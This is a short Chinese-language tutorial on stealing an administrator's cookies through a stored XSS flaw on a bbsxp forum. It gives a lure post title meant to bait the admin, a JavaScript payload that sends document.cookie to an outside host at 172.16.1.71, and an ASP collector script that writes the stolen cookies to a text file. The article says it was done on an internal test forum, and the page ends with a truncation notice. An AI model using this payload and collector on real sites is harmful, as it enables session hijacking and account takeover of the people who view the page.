利用xss漏洞进行Cookie窃取
背景知识
Xss就是跨站脚本攻击XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击的特殊目的。
Xss攻击过程
下面是跨站脚本攻击过程的示意图,它详细的展示了攻击的五个步骤。首先,用户点击了黑客发来的电子邮件中的一个嵌入的链接(第1步)。由于跨站点脚本攻击缺陷的原因,这样会导致用户的浏览器向Web 站点发送一个请求(第2步);服务器端根据该请求会生成一个包含恶意脚本的响应,并将其发回给用户的浏览器(第3步)。当用户的机器执行返回的恶意代码时(第4步),就会将用户的敏感数据发送给黑客的计算机(第5步)。
窃取方法
在Cookie攻击的方法中Cookie窃取是最常用的方式,攻击者在窃取管理员的Cookie后,冒用管理员的身份进行登录,以获取管理员的权限。在本文中我通过一个具有xss漏洞的网站来窃取管理员的Cookie。首先我在网站上发表具有攻击脚本的帖子,当管理员浏览我的帖子时,攻击脚本就开始执行,将管理员的Cookie记录到我指定的文件中(省去了xss攻击过程的第1步)。
窃取过程及代码
首先在论坛(测试部内部搭建的bbsxp论坛)上发表一个帖子,例如帖子标题为“管理员不能看的帖子”,人都有好奇心,你越告诉他不能看,他越看(结果只有一个,上当了),输
入
代
码
javascript:window.open(‘http://172.16.1.71/Cookies.asp?msg=’+document.Cookie) ;
再次自建一个网站,建立一个asp文档代码如下:
testfile=Server.MapPath(\"cookmm.txt\")
msg=Request.QueryString
set fs=server.CreateObject(\"scripting.filesystemobject\")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(\"\"&msg& \"\")
thisfile.closeset fs = nothing
接着就是在网站目录下创建一cookmm.txt文件;
当管理员浏览了我的帖子时,在cookmm.txt文件就记录了管理员的Cookie;
获取到的Cookie信息
因篇幅问题不能全部显示,请点此查看更多更全内容